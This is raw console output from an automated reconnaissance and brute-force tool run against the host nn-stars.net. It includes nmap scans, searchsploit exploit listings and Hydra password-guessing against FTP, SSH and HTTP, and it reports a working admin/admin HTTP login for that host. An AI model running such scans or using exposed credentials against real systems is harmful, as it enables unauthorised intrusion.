- 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
- 53/tcp open domain
- 80/tcp open http nginx
- 111/tcp open rpcbind 2-4 (RPC #100000)
- 538/tcp open gdomap?
- 44601/tcp open status 1 (RPC #100024)
- Aggressive OS guesses: Linux 2.6.39 (96%), Linux 3.2 - 3.8 (94%), Linux 3.1 - 3.2 (94%), WatchGuard Fireware 11.8 (94%), Linux 3.5 (93%), Linux 3.8 (93%), Linux 2.6.32 - 2.6.39 (92%), Linux 2.6.32 - 3.0 (91%), Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%)
- No exact OS matches for host (test conditions non-ideal).
- Uptime guess: 3.639 days (since Mon Oct 23 13:04:14 2017)
- Network Distance: 7 hops
- TCP Sequence Prediction: Difficulty=254 (Good luck!)
- IP ID Sequence Generation: All zeros
- Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 5568.49 seconds
- Raw packets sent: 223089 (9.821MB) | Rcvd: 223436 (9.390MB)
- [92m + -- ----------------------------=[Enumerating Exploits via Searchsploit]=--- -- +[0m
- [i] Reading: '/usr/share/sniper/loot/nmap/nmap-nn-stars.net.xml'
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- [01;31m[Kvsftpd[m[K 2.0.5 - 'CWD' Authenticated Remote Me | linux/dos/5814.pl
- [01;31m[Kvsftpd[m[K 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31818.sh
- [01;31m[Kvsftpd[m[K 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31819.pl
- [01;31m[Kvsftpd[m[K 2.3.2 - Denial of Service | linux/dos/16270.c
- [01;31m[Kvsftpd[m[K 2.3.4 - Backdoor Command Execution (M | unix/remote/17491.rb
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- [01;31m[Kvsftpd[m[K 2.[01;31m[K3[m[K.2 - Denial of Service | linux/dos/16270.c
- [01;31m[Kvsftpd[m[K 2.[01;31m[K3[m[K.4 - Backdoor Command Execution (M | unix/remote/17491.rb
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- Debian [01;31m[KOpenSSH[m[K - Authenticated Remote SELinu | linux/remote/6094.txt
- Dropbear / [01;31m[KOpenSSH[m[K Server - 'MAX_UNAUTH_CLIE | multiple/dos/1572.pl
- FreeBSD [01;31m[KOpenSSH[m[K 3.5p1 - Remote Command Execu | freebsd/remote/17462.txt
- Novell Netware 6.5 - [01;31m[KOpenSSH[m[K Remote Stack Ov | novell/dos/14866.txt
- [01;31m[KOpenSSH[m[K 1.2 - '.scp' File Create/Overwrite | linux/remote/20253.sh
- [01;31m[KOpenSSH[m[K 2.x/3.0.1/3.0.2 - Channel Code Off-b | unix/remote/21314.txt
- [01;31m[KOpenSSH[m[K 2.x/3.x - Kerberos 4 TGT/AFS Token B | linux/remote/21402.txt
- [01;31m[KOpenSSH[m[K 3.x - Challenge-Response Buffer Over | unix/remote/21578.txt
- [01;31m[KOpenSSH[m[K 3.x - Challenge-Response Buffer Over | unix/remote/21579.txt
- [01;31m[KOpenSSH[m[K 4.3 p1 - Duplicated Block Remote Den | multiple/dos/2444.sh
- [01;31m[KOpenSSH[m[K 6.8 < 6.9 - 'PTY' Privilege Escalati | linux/local/41173.c
- [01;31m[KOpenSSH[m[K 7.2 - Denial of Service | linux/dos/40888.py
- [01;31m[KOpenSSH[m[K 7.2p1 - Authenticated xauth Command | multiple/remote/39569.py
- [01;31m[KOpenSSH[m[K 7.2p2 - Username Enumeration | linux/remote/40136.py
- [01;31m[KOpenSSH[m[K < 7.4 - 'UsePrivilegeSeparation Disa | linux/local/40962.txt
- [01;31m[KOpenSSH[m[K < 7.4 - agent Protocol Arbitrary Lib | linux/remote/40963.txt
- [01;31m[KOpenSSH[m[K/PAM 3.6.1p1 - 'gossh.sh' Remote User | linux/remote/26.sh
- [01;31m[KOpenSSH[m[K/PAM 3.6.1p1 - Remote Users Discovery | linux/remote/25.c
- [01;31m[KOpenSSH[m[Kd 7.2p2 - Username Enumeration (PoC) | linux/remote/40113.txt
- Portable [01;31m[KOpenSSH[m[K 3.6.1p-PAM/4.1-SuSE - Timin | multiple/remote/3303.sh
- glibc-2.2 / [01;31m[Kopenssh[m[K-2.3.0p1 / glibc 2.1.9x - | linux/local/258.sh
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- Novell Netware [01;31m[K6[m[K.5 - [01;31m[KOpenSSH[m[K Remote Stack Ov | novell/dos/148[01;31m[K6[m[K[01;31m[K6[m[K.txt
- [01;31m[KOpenSSH[m[K [01;31m[K6[m[K.8 < [01;31m[K6[m[K.9 - 'PTY' Privilege Escalati | linux/local/41173.c
- [01;31m[KOpenSSH[m[K/PAM 3.[01;31m[K6[m[K.1p1 - 'gossh.sh' Remote User | linux/remote/2[01;31m[K6[m[K.sh
- [01;31m[KOpenSSH[m[K/PAM 3.[01;31m[K6[m[K.1p1 - Remote Users Discovery | linux/remote/25.c
- Portable [01;31m[KOpenSSH[m[K 3.[01;31m[K6[m[K.1p-PAM/4.1-SuSE - Timin | multiple/remote/3303.sh
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- Adobe Flash Player - [01;31m[Kdomain[m[KMemory ByteArray | windows/remote/36956.rb
- Adobe Flash Player 7.0.x/8.0.x/9.0.x - Activ | linux/remote/30907.txt
- Alabanza Control Panel 3.0 - [01;31m[KDomain[m[K Modifica | cgi/remote/20238.txt
- Apple Safari 2.0.4 - Cross-[01;31m[KDomain[m[K Browser Lo | multiple/remote/30078.js
- Apple iOS/macOS Kernel - Use-After-Free Due | multiple/dos/42054.c
- BlackBoard Academic Suite 6.2.3.23 - Framese | jsp/webapps/26778.txt
- Cacheflow CacheOS 3.1.x/4.0.x/4.1 - Unresolv | multiple/remote/21649.txt
- Cachelogic Expired [01;31m[KDomain[m[Ks Script 1.0 - Mult | php/webapps/17428.txt
- C[01;31m[Kdomain[m[KFree 2.4 - Remote Command Execution | multiple/remote/19242.txt
- D-Link DCS Series Cameras - Insecure Crossdo | hardware/webapps/42074.txt
- Digi[01;31m[KDomain[m[K 2.2 - 'lookup_result.asp?[01;31m[Kdomain[m[K' | asp/webapps/31546.txt
- Digi[01;31m[KDomain[m[K 2.2 - 'suggest_result.asp' Multip | asp/webapps/31547.txt
- [01;31m[KDomain[m[K Group Network GooCMS 1.02 - 'index.ph | php/webapps/32218.txt
- [01;31m[KDomain[m[K Marketplace Script - SQL Injection | php/webapps/41582.txt
- [01;31m[KDomain[m[K Seller Pro 1.5 - 'id' SQL Injection | php/webapps/7052.txt
- [01;31m[KDomain[m[K Shop - 'index.php' Cross-Site Scripti | php/webapps/36272.txt
- [01;31m[KDomain[m[K Trader 2.0 - 'catalog.php' Cross-Site | php/webapps/31091.txt
- [01;31m[KDomain[m[K Verkaus & Auktions Portal - 'index.ph | php/webapps/33763.txt
- [01;31m[KDomain[m[Ks & Hostings Manager PRO 3.0 - 'entrie | php/webapps/41319.txt
- [01;31m[KDomain[m[Ks Marketplace Script 1.1 - Authenticat | php/webapps/41133.txt
- FreeBSD 3.0 - UNIX-[01;31m[Kdomain[m[K Panic (Denial of S | freebsd/dos/19130.c
- FreeBSD 3.1 / Solaris 2.6 - [01;31m[KDomain[m[K Socket | freebsd/local/19346.c
- GNOME esound 0.2.19 - Unix [01;31m[KDomain[m[K Socket Rac | unix/local/20212.c
- Grandstream Budge Tone-200 IP Phone - Digest | hardware/dos/3535.pl
- HP ProCurve Manager - SNAC Update[01;31m[KDomain[m[KContr | windows/remote/28336.rb
- Hosting Controller 6.1 HotFix 2.2 - Add Doma | asp/webapps/1112.txt
- IBM Tivoli Access Manager for E-Business - ' | multiple/webapps/34909.txt
- JBMC Software DirectAdmin 1.403 - '[01;31m[Kdomain[m[K' C | java/webapps/37033.txt
- ManageEngine ADManager Plus 5.2 Build 5210 - | java/webapps/36667.txt
- Microsoft Internet Explorer 5 - Classic Mode | windows/remote/22728.txt
- Microsoft Internet Explorer 5.0.1 - Cached C | windows/remote/33024.txt
- Microsoft Internet Explorer 5.0.1 - JavaScri | windows/remote/24265.html
- Microsoft Internet Explorer 5/6 - Cross-Doma | windows/remote/23766.html
- Microsoft Internet Explorer 6 - Meta Data Fo | windows/remote/24069.html
- Microsoft Internet Explorer 7/8 - CSS Handli | windows/dos/34602.html
- Microsoft Internet Explorer 7/8 Beta 1 - Fra | windows/remote/31996.txt
- Microsoft Windows - Wkssvc NetrJoin[01;31m[KDomain[m[K2 S | windows/remote/2800.cpp
- Microsoft XML Core Services DTD - Cross-Doma | windows/remote/7196.html
- Mozilla 1.x / opera 6/7 - Timed document.wri | multiple/remote/22751.txt
- Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Pr | linux/remote/27150.txt
- Mozilla Firefox 2.0.0.1 - 'location.hostname | windows/remote/3340.html
- Mozilla Firefox 3.6.8 - 'Math.random()' Cros | unix/remote/34621.c
- MyPHP CMS 0.3 - '[01;31m[Kdomain[m[K' Remote File Inclusi | php/webapps/1983.txt
- Netscape Navigator 4.0.8 - 'about:' [01;31m[KDomain[m[K I | unix/remote/20791.php
- OpenSSH < 7.4 - 'UsePrivilegeSeparation Disa | linux/local/40962.txt
- PHP[01;31m[KDomain[m[KRegister 0.4a-RC2-dev - Multiple Vu | php/webapps/18374.txt
- PHPpool media [01;31m[KDomain[m[K Verkaufs und Auktions P | php/webapps/11733.txt
- Planet Script 1.x - 'i[01;31m[Kdomain[m[Ks.php' Cross-Sit | php/webapps/33993.txt
- QNAP QTS < 4.2.4 - [01;31m[KDomain[m[K Privilege Escalati | hardware/local/41745.txt
- Research In Motion BlackBerry Device Softwar | hardware/remote/34802.html
- Scripts Genie [01;31m[KDomain[m[K Trader - 'catalog.php?i | php/webapps/24510.txt
- SiteTurn [01;31m[KDomain[m[K Manager Pro - Admin Panel Cr | php/webapps/26391.html
- Solaris 2.3/2.4/2.5/2.5.1/2.6/7.0 snoop - 'p | solaris/remote/19663.c
- Ubiquiti Networks UniFi Video Default - 'cro | php/webapps/39268.java
- Ucenter Projekt 2.0 - Insecure cross[01;31m[Kdomain[m[K ( | php/webapps/12455.txt
- WEBB[01;31m[KDOMAIN[m[K Petition 1.02/2.0/3.0 - Authentic | php/webapps/6983.txt
- WEBB[01;31m[KDOMAIN[m[K Polls 1.01 - Authentication Bypas | php/webapps/6984.txt
- WEBB[01;31m[KDOMAIN[m[K Post Card 1.02 - 'catid' SQL Inje | php/webapps/6977.txt
- WEBB[01;31m[KDOMAIN[m[K Post Card 1.02 - Authentication B | php/webapps/6989.txt
- WEBB[01;31m[KDOMAIN[m[K Quiz 1.02 - Authentication Bypass | php/webapps/6985.txt
- WEBB[01;31m[KDOMAIN[m[K WebShop 1.02 - SQL Injection / Cr | php/webapps/6974.txt
- WEBB[01;31m[KDOMAIN[m[K Webshop 1.02 - Authentication Byp | php/webapps/6986.txt
- Web Host Automation Ltd. Helm 3.2.10 Beta - | asp/webapps/27486.txt
- WebKit - 'parent/top' Cross [01;31m[KDomain[m[K Scripting | multiple/remote/33047.html
- WebKit - JavaScript 'onload()' Event Cross D | multiple/remote/33033.html
- WebKit 1.2.x - Local Webpage Cross [01;31m[KDomain[m[K In | windows/remote/35434.txt
- WordPress Plugin WHOIS 1.4.2 3 - '[01;31m[Kdomain[m[K' Cr | php/webapps/36488.txt
- WordPress Plugin oQey-Gallery 0.2 - 'tbpv_do | php/webapps/35288.txt
- Xen 3.3 - XenStore [01;31m[KDomain[m[K Configuration Data | linux/local/32446.txt
- cPanel - Authenticated (lastvisit.html domai | multiple/remote/9039.txt
- cPanel WebHost Manager 3.1 - 'domts2?[01;31m[Kdomain[m[K' | php/webapps/29185.txt
- cPanel WebHost Manager 3.1 - 'editzone?domai | php/webapps/29186.txt
- cPanel WebHost Manager 3.1 - 'park?n[01;31m[Kdomain[m[K' | php/webapps/29188.txt
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- [01;31m[KNginx[m[K (Debian-Based Distros + Gentoo) - 'log | linux/local/40768.sh
- [01;31m[KNginx[m[K 0.6.36 - Directory Traversal | multiple/remote/12804.txt
- [01;31m[KNginx[m[K 0.6.38 - Heap Corruption | linux/local/14830.py
- [01;31m[KNginx[m[K 0.6.x - Arbitrary Code Execution NullB | multiple/webapps/24967.txt
- [01;31m[KNginx[m[K 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5. | linux/dos/9901.txt
- [01;31m[KNginx[m[K 0.7.61 - WebDAV Directory Traversal | multiple/remote/9829.txt
- [01;31m[KNginx[m[K 0.7.64 - Terminal Escape Sequence in L | multiple/remote/33490.txt
- [01;31m[KNginx[m[K 0.7.65/0.8.39 (dev) - Source Disclosur | windows/remote/13822.txt
- [01;31m[KNginx[m[K 0.8.36 - Source Disclosure / Denial of | windows/remote/13818.txt
- [01;31m[KNginx[m[K 1.1.17 - URI Processing SecURIty Bypas | multiple/remote/38846.txt
- [01;31m[KNginx[m[K 1.3.9 < 1.4.0 - Chuncked Encoding Stac | linux/remote/25775.rb
- [01;31m[KNginx[m[K 1.3.9 < 1.4.0 - Denial of Service (PoC | linux/dos/25499.py
- [01;31m[KNginx[m[K 1.3.9/1.4.0 (x86) - Brute Force Remote | lin_x86/remote/26737.pl
- [01;31m[KNginx[m[K 1.4.0 (Generic Linux x64) - Remote Exp | lin_x86-64/remote/32277.txt
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- [01;31m[KRPCBind[m[K / libtirpc - Denial of Service | linux/dos/41974.rb
- Wietse Venema [01;31m[KRpcbind[m[K Replacement 2.1 - Deni | unix/dos/20376.txt
- [01;31m[Krpcbind[m[K - CALLIT procedure UDP Crash (PoC) | linux/dos/26887.rb
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- Wietse Venema [01;31m[KRpcbind[m[K Replacement [01;31m[K2[m[K.1 - Deni | unix/dos/[01;31m[K2[m[K0376.txt
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- [01;31m[Kgdomap[m[K - Multiple Local Information Disclosu | linux/local/33963.txt
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- Accellion FTA - get[01;31m[KStatus[m[K verify_oauth_token | hardware/remote/37597.rb
- AdminBot 9.0.5 - 'live_[01;31m[Kstatus[m[K.lib.php' Remot | php/webapps/4005.txt
- Apache 2.4.7 (mod_[01;31m[Kstatus[m[K) - Scoreboard Handl | linux/dos/34133.txt
- Apache mod_perl - 'Apache::[01;31m[KStatus[m[K' / 'Apache | multiple/remote/9993.txt
- Apple Safari 1.2 Web Browser - TABLE [01;31m[KStatus[m[K | osx/remote/24716.txt
- Apple Safari Web Browser 1.x - HTML Form Sta | osx/dos/24843.txt
- Cisco VoIP Phone CP-7940 3.x - Spoofed SIP S | hardware/remote/25949.pl
- Dell SonicWALL Scrutinizer 9.0.1 - '[01;31m[Kstatus[m[KFi | php/webapps/20033.py
- Dicshunary 0.1a - 'check_[01;31m[Kstatus[m[K.php' Remote | php/webapps/2808.txt
- EPSON [01;31m[KStatus[m[K Monitor 3 - Privilege Escalatio | windows/local/9305.txt
- Google Chrome 3.0195.38 - [01;31m[KStatus[m[K Bar Obfusca | windows/dos/10879.html
- HP Insight Diagnostics Online Edition 8.4 - | php/webapps/34544.txt
- HP Network Node Manager (NMM) i 9.10 - 'nnm/ | jsp/webapps/36356.txt
- ICQ 6 - 'Personal [01;31m[KStatus[m[K Manager' Remote Buf | windows/dos/31656.txt
- Ipswitch IMail 5.0.8/6.0/6.1 - IMonitor stat | windows/dos/19711.txt
- Joomla! Component User [01;31m[KStatus[m[K - Local File I | php/webapps/11998.txt
- Joomla! Component com_virtuemart - order_sta | php/webapps/11271.txt
- MTink 0.9.x - Printer [01;31m[KStatus[m[K Monitor Environ | linux/local/22189.txt
- MailEnable IMAPD 1.54 - [01;31m[KSTATUS[m[K Request Buffe | windows/remote/16485.rb
- ManageEngine Desktop Central [01;31m[KStatus[m[KUpdate - | windows/remote/34594.rb
- Microsoft Internet Explorer 5.0.1 - Mouse Ev | windows/remote/25095.txt
- Microsoft Internet Explorer 6 - HTML Form St | windows/remote/23903.html
- Microsoft Internet Explorer 6 - IFRAME Statu | windows/remote/24720.txt
- Microsoft Internet Explorer 6 - TABLE [01;31m[KStatus[m[K | windows/remote/24712.txt
- Microsoft WININET.dll - CHttpÂHeaderÂParse | windows/dos/40747.html
- Mozilla Firefox 3.0.5 - [01;31m[KStatus[m[K Bar Obfuscati | windows/remote/7842.html
- Mozilla Suite/Firefox/Thunderbird - Nested A | linux/remote/25221.txt
- MyBB My[01;31m[KStatus[m[K 3.1 - SQL Injection | php/webapps/17972.txt
- Nagios 3.0.6 - '[01;31m[Kstatus[m[Kwml.cgi' Arbitrary She | cgi/remote/33051.txt
- Nagios3 - [01;31m[Kstatus[m[Kwml.cgi Command Injection (M | unix/webapps/9861.rb
- Nagios3 - [01;31m[Kstatus[m[Kwml.cgi Ping Command Executi | cgi/webapps/16908.rb
- Novell NetMail 3.52d - IMAP [01;31m[KSTATUS[m[K Buffer Ov | windows/remote/16483.rb
- Opera 10.10 - [01;31m[KStatus[m[K Bar Obfuscation | multiple/dos/10870.html
- Opera Web Browser 8.0/8.5 - HTML Form [01;31m[KStatus[m[K | multiple/remote/26531.html
- OrangeHRM 2.7 RC - '/plugins/ajaxCalls/haltR | php/webapps/37143.txt
- Pligg CMS 1.1.2 - '[01;31m[Kstatus[m[K' SQL Injection | php/webapps/36495.txt
- Pluto[01;31m[KStatus[m[K Locator 1.0pre alpha - 'index.ph | php/webapps/31202.txt
- Post Affiliate Pro 3 - 'umprof_[01;31m[Kstatus[m[K' Blind | php/webapps/7238.txt
- [01;31m[KStatus[m[K2k - Remote Add Admin | php/webapps/11258.html
- [01;31m[KStatus[m[K2k Server Monitoring Software - Multip | php/webapps/34239.txt
- [01;31m[KStatus[m[KNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - | php/webapps/28956.txt
- WhatsApp [01;31m[KStatus[m[K Changer 0.2 - Exploit | php/webapps/18396.sh
- Yahoo! Messenger 5.x/6.0 - Offline Mode Stat | windows/remote/25196.txt
- iScripts AutoHoster - 'checktransfer[01;31m[Kstatus[m[K.p | php/webapps/38885.txt
- iScripts AutoHoster - 'checktransfer[01;31m[Kstatus[m[Kbc | php/webapps/38886.txt
- osCMax 2.5 - '/admin/stats_monthly_sales.php | php/webapps/37042.txt
- osCMax 2.5 - '/admin/stats_monthly_sales.php | php/webapps/37048.txt
- osCommerce 2.2 - '/admin/orders_[01;31m[Kstatus[m[K.php?p | php/webapps/28750.txt
- osTicket - 'tickets.php?[01;31m[Kstatus[m[K' Cross-Site S | php/webapps/38162.txt
- pfSense - '[01;31m[Kstatus[m[K_graph.php?if' Cross-Site S | hardware/remote/35070.txt
- phpMyAdmin 2.11.1 - 'Server_[01;31m[KStatus[m[K.php' Cros | php/webapps/30733.txt
- xtell 2.6.1 - User [01;31m[KStatus[m[K Remote Information | linux/remote/21310.txt
- --------------------------------------------- ----------------------------------
- --------------------------------------------- ----------------------------------
- Exploit Title | Path
- | (/usr/share/exploitdb/platforms/)
- --------------------------------------------- ----------------------------------
- Apple Safari [01;31m[K1[m[K.2 Web Browser - TABLE [01;31m[KStatus[m[K | osx/remote/247[01;31m[K1[m[K6.txt
- Apple Safari Web Browser [01;31m[K1[m[K.x - HTML Form Sta | osx/dos/24843.txt
- Dell SonicWALL Scrutinizer 9.0.[01;31m[K1[m[K - '[01;31m[Kstatus[m[KFi | php/webapps/20033.py
- Dicshunary 0.[01;31m[K1[m[Ka - 'check_[01;31m[Kstatus[m[K.php' Remote | php/webapps/2808.txt
- Google Chrome 3.0[01;31m[K1[m[K95.38 - [01;31m[KStatus[m[K Bar Obfusca | windows/dos/[01;31m[K1[m[K0879.html
- HP Network Node Manager (NMM) i 9.[01;31m[K1[m[K0 - 'nnm/ | jsp/webapps/36356.txt
- Ipswitch IMail 5.0.8/6.0/6.[01;31m[K1[m[K - IMonitor stat | windows/dos/[01;31m[K1[m[K97[01;31m[K1[m[K[01;31m[K1[m[K.txt
- MailEnable IMAPD [01;31m[K1[m[K.54 - [01;31m[KSTATUS[m[K Request Buffe | windows/remote/[01;31m[K1[m[K6485.rb
- Microsoft Internet Explorer 5.0.[01;31m[K1[m[K - Mouse Ev | windows/remote/25095.txt
- Microsoft WININET.dll - CHttpÂHeaderÂParse | windows/dos/40747.html
- MyBB My[01;31m[KStatus[m[K 3.[01;31m[K1[m[K - SQL Injection | php/webapps/[01;31m[K1[m[K7972.txt
- Opera [01;31m[K1[m[K0.[01;31m[K1[m[K0 - [01;31m[KStatus[m[K Bar Obfuscation | multiple/dos/[01;31m[K1[m[K0870.html
- Pligg CMS [01;31m[K1[m[K.[01;31m[K1[m[K.2 - '[01;31m[Kstatus[m[K' SQL Injection | php/webapps/36495.txt
- Pluto[01;31m[KStatus[m[K Locator [01;31m[K1[m[K.0pre alpha - 'index.ph | php/webapps/3[01;31m[K1[m[K202.txt
- phpMyAdmin 2.[01;31m[K1[m[K[01;31m[K1[m[K.[01;31m[K1[m[K - 'Server_[01;31m[KStatus[m[K.php' Cros | php/webapps/30733.txt
- xtell 2.6.[01;31m[K1[m[K - User [01;31m[KStatus[m[K Remote Information | linux/remote/2[01;31m[K1[m[K3[01;31m[K1[m[K0.txt
- --------------------------------------------- ----------------------------------
- [92m + -- ----------------------------=[Running Brute Force]=--------------------- -- +[0m
- [91m __________ __ ____ ___[0m
- [91m \______ \_______ __ ___/ |_ ____ \ \/ /[0m
- [91m | | _/\_ __ \ | \ __\/ __ \ \ / [0m
- [91m | | \ | | \/ | /| | \ ___/ / \ [0m
- [91m |______ / |__| |____/ |__| \___ >___/\ \ [0m
- [91m \/ \/ \_/[0m
- [91m + -- --=[BruteX v1.7 by 1N3[0m
- [91m + -- --=[http://crowdshield.com[0m
- [92m################################### Running Port Scan ##############################[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 04:24 EDT
- Nmap scan report for nn-stars.net (93.174.91.164)
- Host is up (0.14s latency).
- rDNS record for 93.174.91.164: no-reverse-dns-configured.com
- Not shown: 19 closed ports, 3 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds
- [92m################################### Running Brute Force ############################[0m
- [92m + -- --=[Port 21 opened... running tests...[0m
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-27 04:24:11
- [DATA] max 1 task per 1 server, overall 1 task, 30 login tries, ~30 tries per task
- [DATA] attacking ftp://nn-stars.net:21/
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-27 04:25:07
- [92m + -- --=[Port 22 opened... running tests...[0m
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-27 04:25:07
- [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
- [DATA] attacking ssh://nn-stars.net:22/
- [STATUS] 16.00 tries/min, 16 tries in 00:01h, 1480 to do in 01:33h, 1 active
- [STATUS] 13.67 tries/min, 41 tries in 00:03h, 1455 to do in 01:47h, 1 active
- [STATUS] 14.43 tries/min, 101 tries in 00:07h, 1395 to do in 01:37h, 1 active
- [STATUS] 14.42 tries/min, 173 tries in 00:12h, 1323 to do in 01:32h, 1 active
- [STATUS] 14.47 tries/min, 246 tries in 00:17h, 1250 to do in 01:27h, 1 active
- [STATUS] 14.59 tries/min, 321 tries in 00:22h, 1175 to do in 01:21h, 1 active
- [STATUS] 14.56 tries/min, 393 tries in 00:27h, 1103 to do in 01:16h, 1 active
- [STATUS] 14.50 tries/min, 464 tries in 00:32h, 1032 to do in 01:12h, 1 active
- [STATUS] 14.30 tries/min, 529 tries in 00:37h, 967 to do in 01:08h, 1 active
- [STATUS] 14.36 tries/min, 603 tries in 00:42h, 893 to do in 01:03h, 1 active
- [STATUS] 14.40 tries/min, 677 tries in 00:47h, 819 to do in 00:57h, 1 active
- [STATUS] 14.23 tries/min, 740 tries in 00:52h, 756 to do in 00:54h, 1 active
- [STATUS] 14.21 tries/min, 810 tries in 00:57h, 686 to do in 00:49h, 1 active
- [STATUS] 13.98 tries/min, 867 tries in 01:02h, 629 to do in 00:45h, 1 active
- [STATUS] 13.66 tries/min, 915 tries in 01:07h, 581 to do in 00:43h, 1 active
- [STATUS] 13.62 tries/min, 981 tries in 01:12h, 515 to do in 00:38h, 1 active
- [STATUS] 13.42 tries/min, 1033 tries in 01:17h, 463 to do in 00:35h, 1 active
- [STATUS] 13.11 tries/min, 1075 tries in 01:22h, 421 to do in 00:33h, 1 active
- [STATUS] 12.89 tries/min, 1121 tries in 01:27h, 375 to do in 00:30h, 1 active
- [STATUS] 12.65 tries/min, 1164 tries in 01:32h, 332 to do in 00:27h, 1 active
- [STATUS] 12.41 tries/min, 1204 tries in 01:37h, 292 to do in 00:24h, 1 active
- [STATUS] 12.17 tries/min, 1241 tries in 01:42h, 255 to do in 00:21h, 1 active
- [STATUS] 11.97 tries/min, 1281 tries in 01:47h, 215 to do in 00:18h, 1 active
- [STATUS] 11.71 tries/min, 1312 tries in 01:52h, 184 to do in 00:16h, 1 active
- [STATUS] 11.52 tries/min, 1348 tries in 01:57h, 148 to do in 00:13h, 1 active
- [STATUS] 11.49 tries/min, 1356 tries in 01:58h, 140 to do in 00:13h, 1 active
- [STATUS] 11.45 tries/min, 1362 tries in 01:59h, 134 to do in 00:12h, 1 active
- [STATUS] 11.42 tries/min, 1370 tries in 02:00h, 126 to do in 00:12h, 1 active
- [STATUS] 11.35 tries/min, 1373 tries in 02:01h, 123 to do in 00:11h, 1 active
- [STATUS] 11.31 tries/min, 1380 tries in 02:02h, 116 to do in 00:11h, 1 active
- [STATUS] 11.28 tries/min, 1388 tries in 02:03h, 108 to do in 00:10h, 1 active
- [STATUS] 11.25 tries/min, 1395 tries in 02:04h, 101 to do in 00:09h, 1 active
- [STATUS] 11.24 tries/min, 1405 tries in 02:05h, 91 to do in 00:09h, 1 active
- [STATUS] 11.21 tries/min, 1413 tries in 02:06h, 83 to do in 00:08h, 1 active
- [STATUS] 11.21 tries/min, 1424 tries in 02:07h, 72 to do in 00:07h, 1 active
- [STATUS] 11.19 tries/min, 1432 tries in 02:08h, 64 to do in 00:06h, 1 active
- [STATUS] 11.16 tries/min, 1439 tries in 02:09h, 57 to do in 00:06h, 1 active
- [STATUS] 11.07 tries/min, 1439 tries in 02:10h, 57 to do in 00:06h, 1 active
- [STATUS] 11.06 tries/min, 1449 tries in 02:11h, 47 to do in 00:05h, 1 active
- [STATUS] 11.05 tries/min, 1458 tries in 02:12h, 38 to do in 00:04h, 1 active
- [STATUS] 11.02 tries/min, 1466 tries in 02:13h, 30 to do in 00:03h, 1 active
- [STATUS] 10.99 tries/min, 1473 tries in 02:14h, 23 to do in 00:03h, 1 active
- [STATUS] 10.99 tries/min, 1483 tries in 02:15h, 13 to do in 00:02h, 1 active
- [STATUS] 10.98 tries/min, 1493 tries in 02:16h, 3 to do in 00:01h, 1 active
- 1 of 1 target completed, 0 valid passwords found
- Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-27 06:41:33
- [91m + -- --=[Port 23 closed... skipping.[0m
- [91m + -- --=[Port 25 closed... skipping.[0m
- [92m + -- --=[Port 80 opened... running tests...[0m
- Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-27 06:41:33
- [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
- [DATA] attacking http-get://nn-stars.net:80//
- [80][http-get] host: nn-stars.net login: admin password: admin
- [STATUS] attack finished for nn-stars.net (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-27 06:41:38
- [91m + -- --=[Port 110 closed... skipping.[0m
- [91m + -- --=[Port 139 closed... skipping.[0m
- [91m + -- --=[Port 162 closed... skipping.[0m
- [91m + -- --=[Port 389 closed... skipping.[0m
- [91m + -- --=[Port 443 closed... skipping.[0m
